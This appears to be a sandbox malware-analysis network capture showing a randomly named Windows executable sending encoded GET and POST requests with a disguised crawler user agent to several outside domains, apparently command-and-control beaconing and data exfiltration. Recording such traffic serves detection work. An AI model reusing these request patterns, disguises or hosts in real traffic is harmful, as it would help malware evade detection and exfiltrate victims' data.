May 27, 2024 12:22:57.484853983 CEST	1236	IN	Data Raw: 6c 48 4a 30 6a 6f 42 34 66 51 6d 35 2f 45 71 79 39 72 49 53 6c 57 30 6a 4c 33 68 78 34 56 6d 46 47 46 34 70 74 78 43 6a 6c 65 55 53 52 35 7a 73 7a 46 79 56 2b 4b 55 31 67 32 6f 38 64 7a 73 45 53 33 75 78 67 70 62 4e 74 31 56 6c 67 54 64 56 61 75 Data Ascii: lHJ0joB4fQm5/Eqy9rISlW0jL3hx4VmFGF4ptxCjleUSR5zszFyV+KU1g2o8dzsES3uxgpbNt1VlgTdVau1aoik2UEKMId+sJRxr3HkSsmzjGq2vyMJSqd0rhVIx+04fJzkTfJhsJIa5nxkLEUTSBqunjdK1J43avY+GUHtkCcj/DtJ4B/uSNEIkMZr2WRokyXZu++Goc+suCZKgta0jZ+5JtvGmgMbS3nBllxBmTvID7zeRn37
May 27, 2024 12:22:57.485121965 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:22:56 GMT Server: Apache Last-Modified: Thu, 28 Dec 2023 09:40:51 GMT ETag: "500c-60d8eb618ba1d" Accept-Ranges: bytes Content-Length: 20492 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2e 2e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 0d 0a 09 3c 73 74 79 6c 65 3e 0d [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Error 404 - Page not found!</title> <link rel="icon" type="image/png" href="../favicon.ico"><style> html { height: 80%; } body { text-align:left; height:100%; background: #F3F3F3; font-size: 62.5%; font-family: 'Lucida Grande', Verdana, Arial, Sans-Serif; margin-top:10px; margin-bottom:10px; margin-right:10px; margin-left:10px; padding:0px; } body,td,th { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9pt; color: #3333

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.12	49763	103.120.178.210	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:58.425147057 CEST	425	OUT	GET /s5gg/?VlEHDVvh=Lex3y3SP4nMuJeMgNnltykKJrtse07Leq1Ynk5nBUbN+LWWMQkpVzy+EMOTic1Ks5WEW61I3b9noLb4lZz3/VBahdTtzKpjYDK5Fm2hl+YH8rBOlCQe91Nk=&BHPD=o2nt HTTP/1.1 Host: www.knockdubai.ae Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
May 27, 2024 12:22:59.457406998 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:22:59 GMT Server: Apache Last-Modified: Thu, 28 Dec 2023 09:40:51 GMT ETag: "500c-60d8eb618ba1d" Accept-Ranges: bytes Content-Length: 20492 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2e 2e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 0d 0a 09 3c 73 74 79 6c 65 3e 0d [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Error 404 - Page not found!</title> <link rel="icon" type="image/png" href="../favicon.ico"><style> html { height: 80%; } body { text-align:left; height:100%; background: #F3F3F3; font-size: 62.5%; font-family: 'Lucida Grande', Verdana, Arial, Sans-Serif; margin-top:10px; margin-bottom:10px; margin-right:10px; margin-left:10px; padding:0px; } body,td,th { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9pt; color: #3333
May 27, 2024 12:22:59.457423925 CEST	1236	IN	Data Raw: 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 Data Ascii: 33; } h1,h2,h3,h4,h5,h6 { font-family: Geneva, Arial, Helvetica, sans-serif; } h1 { font-size: 28px; font-weight:bold; colo
May 27, 2024 12:22:59.457453966 CEST	448	IN	Data Raw: 74 32 67 41 44 43 4b 67 67 51 51 46 67 46 41 51 49 49 71 30 55 41 41 59 52 56 4a 55 41 41 59 52 55 45 43 43 43 73 67 67 41 42 68 46 55 51 49 49 42 59 73 4e 6a 44 41 42 42 41 57 46 55 43 42 42 41 4c 41 77 4f 6d 55 6f 41 41 77 71 6f 53 49 49 43 77 Data Ascii: t2gADCKggQQFgFAQIIq0UAAYRVJUAAYRUECCCsggABhFUQIIBYsNjDABBAWFUCBBALAwOmUoAAwqoSIICwCgIEEFaLAAIIq0qAAMIqCBBAWAMEIICwqgQIIKyCAAGEVRAggLAKAgQQVkGAAMIqCBBAWJ0EEEBYVQIEEFZBgADCmmwAAgirSoAAwioIEEBYbQcIIKwqAQIIqyBAAGEVBAggrIIAAYQ14gACCKtKgADC6iSAAMKqE
May 27, 2024 12:22:59.457470894 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 0d 0a Data Ascii: padding: 0 20px 10px; -moz-border-radius: 10px; border-radius: 10px; min-height: 90%; } .header_logo { display:block;
May 27, 2024 12:22:59.457483053 CEST	1236	IN	Data Raw: 39 33 76 72 4f 66 2b 37 78 6e 49 49 70 4b 78 6a 72 47 67 75 62 6b 39 2f 37 4f 5a 4c 37 6c 6e 50 4d 2b 37 2f 2f 2f 50 4d 2b 37 6a 52 52 46 45 55 34 65 4c 35 31 44 50 6c 6b 46 4a 77 45 35 65 52 7a 6e 55 46 2b 57 64 32 30 66 30 74 32 67 2f 43 59 58 Data Ascii: 93vrOf+7xnIIpKxjrGgubk9/7OZL7lnPM+7///PM+7jRRFEU4eL51DPlkFJwE5eRznUF+Wd20f0t2g/CYXtcsNy18K2d4cKO19kIOdspbdqamLH5W0M+97OT6a9HLjEK9xy5964ez7g6CrG0E/Mok+ILIQhk34YR1RaAOhJ976KMs7je437D4JyAk4GqXv9kbh1M2mnrlQ15cztpcSiCyg+TzrBIHZN34UF/CPwneG4fhF19fwY
May 27, 2024 12:22:59.457494974 CEST	1236	IN	Data Raw: 53 6e 44 78 5a 51 72 35 65 51 38 71 63 51 73 53 43 35 41 63 48 6b 59 39 63 35 77 64 6a 67 53 55 42 65 35 4a 69 70 37 48 68 2f 7a 6a 68 33 41 4d 33 48 71 4b 6f 55 7a 4d 36 4f 59 76 54 49 53 6a 54 44 46 70 70 4e 48 38 32 36 6a 62 37 2b 43 5a 79 78 Data Ascii: SnDxZQr5eQ8qcQsSC5AcHkY9c5wdjgSUBe5Jip7Hh/zjh3AM3HqKoUzM6OYvTISjTDFppNH826jb7+CZyx5lQklQv4AbpxguaGk7CU+6m0noGc7EX/ygTyS0bgRA5qXhJ16xBqfg6P7bSheEdo6ot8rROmL6Utu3LdSUB+ynF08oOb0rnwKujd8Btl4jGMR5/SYCGNpt1E4LaQcCMMLm1ixaqQjpHuPDXCbDUDPZxCgloLVohop
May 27, 2024 12:22:59.457505941 CEST	1236	IN	Data Raw: 52 4b 57 4c 75 36 68 63 36 4f 39 59 79 4f 43 6a 32 48 78 63 69 51 34 55 57 56 75 45 2f 4b 38 32 59 68 73 70 62 45 51 6a 49 68 68 77 54 77 42 41 67 38 53 33 49 51 56 33 4a 6f 48 2b 54 50 35 32 50 31 73 6a 49 47 65 77 2f 43 43 31 62 44 68 68 6a 6c Data Ascii: RKWLu6hc6O9YyOCj2HxciQ4UWVuE/K82YhspbEQjIhhwTwBAg8S3IQV3JoH+TP52P1sjIGew/CC1bDhhjlncWzpIyjI2NMdeSh4CixzvOzxcF69d5tv1aAtMc+Pqg69/5NO1xOTtgJ38pjx4EsjjRWsdIVaEUVnbUOnHnaw1hzWi8i+wDTUo3RMYsgqjMtGfCpsjTFi8dAVNUnrzcpf10CxQt4AStXhuKLFFeEV3sMhYGVGDwtg
May 27, 2024 12:22:59.457516909 CEST	1236	IN	Data Raw: 68 6a 72 6a 41 36 56 44 45 39 71 77 6b 2f 34 76 76 6b 46 50 79 77 42 64 58 7a 73 62 49 72 67 56 65 65 55 55 4e 61 61 6a 48 43 48 4b 69 4b 6a 55 4e 46 47 64 2f 62 75 77 54 74 6b 6f 49 55 78 74 68 51 75 70 48 30 39 78 65 38 6d 52 39 63 38 79 73 46 Data Ascii: hjrjA6VDE9qwk/4vvkFPywBdXzsbIrgVeeUUNaajHCHKiKjUNFGd/buwTtkoIUxthQupH09xe8mR9c8ysFSFT7xFVJvWuTZVBSNvsYHXvw4M5ezLay8CllPWYlI+zAGWc/ip7eHr6HHCHTxIkuEVa8KJEARArnSPq530kEpEpjV6s20GxasNtzKSwMw7mHo2JjS6BQsEn2CdhukyIhC1kbh9pYigvOd9GTseCGJqU0wVIP4f59A
May 27, 2024 12:22:59.457528114 CEST	1236	IN	Data Raw: 78 33 54 43 6f 6f 34 73 46 6e 75 2f 48 6b 72 67 34 6b 74 43 6d 6f 4a 71 4e 54 36 59 64 5a 33 37 48 4e 6e 76 6e 71 75 70 63 56 49 4d 48 52 61 7a 5a 35 7a 75 35 74 43 61 55 44 72 69 77 47 6a 7a 70 78 2f 77 4d 61 6e 70 33 32 34 31 35 5a 78 36 70 41 Data Ascii: x3TCoo4sFnu/Hkrg4ktCmoJqNT6YdZ37HNnvnqupcVIMHRazZ5zu5tCaUDriwGjzpx/wManp32415Zx6pAoiI6f/04TlkdMBaY7x0hVy06c9o/32fl12IgRKoTGca3o/gskRfabLW2FVE9Fams6LhJ+AGlrMsIs5niGvbcfRA7PmB4rIi+r+fPzxeYVGcOiVsfwGUXjSKjN2n6K3AabbTDLL7xQB4TpWFGeY6gOzSRfXqr/KlPv
May 27, 2024 12:22:59.457542896 CEST	776	IN	Data Raw: 57 38 44 74 47 63 41 36 52 70 6f 72 76 66 77 43 76 50 43 62 45 34 4d 59 6d 6f 59 7a 56 36 63 69 36 6d 69 6a 6f 2b 2b 36 30 51 52 77 35 55 45 56 6c 48 55 4a 73 39 7a 50 63 65 31 4f 33 68 6a 31 33 33 6b 67 4d 6b 71 4e 32 72 4e 36 74 66 2b 70 53 52 Data Ascii: W8DtGcA6RporvfwCvPCbE4MYmoYzV6ci6mijo++60QRw5UEVlHUJs9zPce1O3hj133kgMkqN2rN6tf+pSRGIDk2LGj3nVoAnf8IETFKUAxMnDLLlb3kcgvcmAyHZlJK56RKHpmj1eEMJBpCgV/iIkOQk0ZuhvPvQpcMXglxxU9FyUSHDHVh87dFKtzZT2u5BgIMagVA+Ljh91FITSNfKXwvZ5Ym0F+C8Ri0irW9AGXnmtjz6692
May 27, 2024 12:22:59.462570906 CEST	1236	IN	Data Raw: 6c 48 4a 30 6a 6f 42 34 66 51 6d 35 2f 45 71 79 39 72 49 53 6c 57 30 6a 4c 33 68 78 34 56 6d 46 47 46 34 70 74 78 43 6a 6c 65 55 53 52 35 7a 73 7a 46 79 56 2b 4b 55 31 67 32 6f 38 64 7a 73 45 53 33 75 78 67 70 62 4e 74 31 56 6c 67 54 64 56 61 75 Data Ascii: lHJ0joB4fQm5/Eqy9rISlW0jL3hx4VmFGF4ptxCjleUSR5zszFyV+KU1g2o8dzsES3uxgpbNt1VlgTdVau1aoik2UEKMId+sJRxr3HkSsmzjGq2vyMJSqd0rhVIx+04fJzkTfJhsJIa5nxkLEUTSBqunjdK1J43avY+GUHtkCcj/DtJ4B/uSNEIkMZr2WRokyXZu++Goc+suCZKgta0jZ+5JtvGmgMbS3nBllxBmTvID7zeRn37

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.12	49764	217.107.219.102	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:04.918699026 CEST	694	OUT	POST /oqq6/ HTTP/1.1 Host: www.arsenjev.fun Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.arsenjev.fun Cache-Control: no-cache Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Referer: http://www.arsenjev.fun/oqq6/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 6d 79 49 51 4d 56 4a 53 4f 31 47 72 58 30 66 76 35 73 6e 63 62 72 69 4f 65 66 5a 67 36 36 42 6b 54 47 6b 72 56 45 6a 5a 41 42 52 68 61 61 59 2f 2b 2b 76 78 46 44 62 45 52 49 6d 6d 68 61 47 73 6c 63 7a 37 4f 48 77 53 42 55 33 62 58 5a 64 54 2b 2f 47 61 6f 45 2f 35 47 68 68 37 63 35 68 50 33 6d 31 70 75 6a 62 4b 79 4a 70 4b 32 6b 42 51 39 62 6e 66 51 78 42 64 54 77 50 48 76 38 74 6b 4d 47 42 75 51 33 4e 64 7a 74 69 54 64 48 63 45 44 6d 75 45 65 50 34 56 36 32 66 37 33 63 6b 56 34 67 57 79 71 4d 39 45 43 39 54 30 6a 31 73 38 74 73 70 6e 35 2f 50 68 36 34 68 4a 48 48 4d 71 61 77 3d 3d Data Ascii: VlEHDVvh=myIQMVJSO1GrX0fv5sncbriOefZg66BkTGkrVEjZABRhaaY/++vxFDbERImmhaGslcz7OHwSBU3bXZdT+/GaoE/5Ghh7c5hP3m1pujbKyJpK2kBQ9bnfQxBdTwPHv8tkMGBuQ3NdztiTdHcEDmuEeP4V62f73ckV4gWyqM9EC9T0j1s8tspn5/Ph64hJHHMqaw==
May 27, 2024 12:23:05.672357082 CEST	460	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 27 May 2024 10:23:05 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: http://arsenjev.fun/oqq6/ Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.12	49765	217.107.219.102	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:07.650634050 CEST	714	OUT	POST /oqq6/ HTTP/1.1 Host: www.arsenjev.fun Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.arsenjev.fun Cache-Control: no-cache Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Referer: http://www.arsenjev.fun/oqq6/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 6d 79 49 51 4d 56 4a 53 4f 31 47 72 57 55 50 76 34 50 50 63 51 72 69 4e 48 76 5a 67 68 4b 42 67 54 48 59 72 56 46 6e 4a 42 33 42 68 64 34 51 2f 2f 2f 76 78 4a 6a 62 45 61 6f 6d 6a 76 36 47 79 6c 64 50 5a 4f 43 51 53 42 55 6a 62 58 5a 74 54 39 4f 47 62 70 55 2f 6e 4b 42 68 35 43 4a 68 50 33 6d 31 70 75 6a 66 67 79 4a 42 4b 32 58 4a 51 76 75 4c 51 4f 42 42 61 51 77 50 48 72 38 74 67 4d 47 41 39 51 7a 4e 7a 7a 75 4b 54 64 46 45 45 53 56 32 46 55 50 34 54 31 57 65 76 6b 63 56 44 38 41 57 39 70 4e 59 6a 46 65 4f 59 76 54 39 6d 79 65 68 78 73 38 62 73 33 76 59 35 4b 45 78 6a 42 33 71 56 70 44 51 52 4b 2f 72 63 58 50 42 75 47 48 62 50 2b 76 34 3d Data Ascii: VlEHDVvh=myIQMVJSO1GrWUPv4PPcQriNHvZghKBgTHYrVFnJB3Bhd4Q///vxJjbEaomjv6GyldPZOCQSBUjbXZtT9OGbpU/nKBh5CJhP3m1pujfgyJBK2XJQvuLQOBBaQwPHr8tgMGA9QzNzzuKTdFEESV2FUP4T1WevkcVD8AW9pNYjFeOYvT9myehxs8bs3vY5KExjB3qVpDQRK/rcXPBuGHbP+v4=
May 27, 2024 12:23:08.334196091 CEST	460	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 27 May 2024 10:23:08 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: http://arsenjev.fun/oqq6/ Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.12	49766	217.107.219.102	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:10.288647890 CEST	1727	OUT	POST /oqq6/ HTTP/1.1 Host: www.arsenjev.fun Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.arsenjev.fun Cache-Control: no-cache Connection: close Content-Length: 1237 Content-Type: application/x-www-form-urlencoded Referer: http://www.arsenjev.fun/oqq6/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 6d 79 49 51 4d 56 4a 53 4f 31 47 72 57 55 50 76 34 50 50 63 51 72 69 4e 48 76 5a 67 68 4b 42 67 54 48 59 72 56 46 6e 4a 42 33 4a 68 64 4e 63 2f 77 38 33 78 48 44 62 45 58 49 6d 69 76 36 48 33 6c 63 6e 64 4f 43 4e 76 42 57 62 62 56 34 4e 54 31 63 75 62 67 55 2f 6e 43 68 68 34 63 35 68 67 33 6d 6c 54 75 6a 76 67 79 4a 42 4b 32 52 74 51 73 37 6e 51 4d 42 42 64 54 77 50 4c 76 38 74 59 4d 47 59 74 51 7a 5a 4e 7a 2b 71 54 65 6c 55 45 51 48 75 46 57 76 34 52 32 57 65 6e 6b 63 59 64 38 41 4b 48 70 4e 74 45 46 5a 69 59 38 69 59 61 75 65 52 7a 2f 74 71 4b 2f 39 73 57 48 7a 64 47 45 30 69 61 74 54 34 58 59 64 54 6f 64 64 55 45 54 58 6a 66 74 72 62 55 6d 39 2b 30 39 33 44 52 51 31 77 2b 71 68 62 78 2f 65 59 32 63 53 2f 31 73 46 6a 52 4e 6d 70 66 32 4f 4d 30 46 38 33 39 38 5a 75 79 33 46 70 4e 49 6f 49 61 47 56 47 54 6a 48 71 68 38 44 67 73 72 4c 54 4a 4d 74 7a 67 70 55 39 72 69 43 51 78 73 4f 76 71 35 41 6a 6d 72 41 42 35 4a 64 43 42 50 30 33 33 4e 57 58 50 62 45 6a 59 48 4a 73 44 79 [TRUNCATED] Data Ascii: VlEHDVvh=myIQMVJSO1GrWUPv4PPcQriNHvZghKBgTHYrVFnJB3JhdNc/w83xHDbEXImiv6H3lcndOCNvBWbbV4NT1cubgU/nChh4c5hg3mlTujvgyJBK2RtQs7nQMBBdTwPLv8tYMGYtQzZNz+qTelUEQHuFWv4R2WenkcYd8AKHpNtEFZiY8iYaueRz/tqK/9sWHzdGE0iatT4XYdToddUETXjftrbUm9+093DRQ1w+qhbx/eY2cS/1sFjRNmpf2OM0F8398Zuy3FpNIoIaGVGTjHqh8DgsrLTJMtzgpU9riCQxsOvq5AjmrAB5JdCBP033NWXPbEjYHJsDyKYXTH12mMnpytFPeLTMb/H7Bq7Sr9bH/pd9SWRGdkQw/zkYhQsX1xBhjcCq16STBRsfxfA73oUQMqD5IsXeN/d9qj8C7NmVSU3CRqJUftQMsY0rpNomAWozpH7ywBpxhMHxSHVTVd0oxRPJ+gqYXPOB0rjmi8G3HBhjvxXFw58lB5IUFMJFRwFeNpqHPqZKIeFnbsO7CiT1EL4+16pJtEc0peLx27aB450Jofu1WNZkzYkD+9JanpFnnbWiO9pl+ozBSPQxhLhQlDIoFoPqSimg7wPMenNdY28H/rGxzeAL1xVyt4AfmAtXGcZNtJUvWtkB8REz4rxSR+/p2IaMcK5Xn9apB8HkbOWXuwQuzzr12pCuwRocFfbyAjr8kVJJIG5WplnEVoqqPO5SBgg7xOfLyCl/tbF7f+uUhZ+arIQmpHZdY3Hvq/5CSm0oIWq7c4g7Id0u+s6ZswYi6mPt0KAg0qBcQ3fBpFaY9oFlirr+JKzkmCEAEllD2O9v2hKaudMDRONiWB1SlNw59Qkc2Fxa1smlrGirMk8uGXPbn62Dy9pnK3FQwHT/qWjo0ms9GQ2hmyHG56Z5fG0b3icCIEgcxJlgJN5tW4s8jCLP8kF4H2XzOgPu9veHKQGdZOsR5M9v0MZzimqoodQJEf2UfC1m+Uu5GiB2pSy [TRUNCATED]
May 27, 2024 12:23:10.984122992 CEST	460	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 27 May 2024 10:23:10 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: http://arsenjev.fun/oqq6/ Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.12	49767	217.107.219.102	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:12.830565929 CEST	424	OUT	GET /oqq6/?VlEHDVvh=rwgwPlALEUzYU2aVnuvDPIeIRMF/prMxeEAjcX/DBUkDQJY+y8rHCEXmR7eGsa/wgYTHR39WGVXgcrNwnNHcmkfubB89b8ls2WhHljXtxKg/z1p/kKzkfHY=&BHPD=o2nt HTTP/1.1 Host: www.arsenjev.fun Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
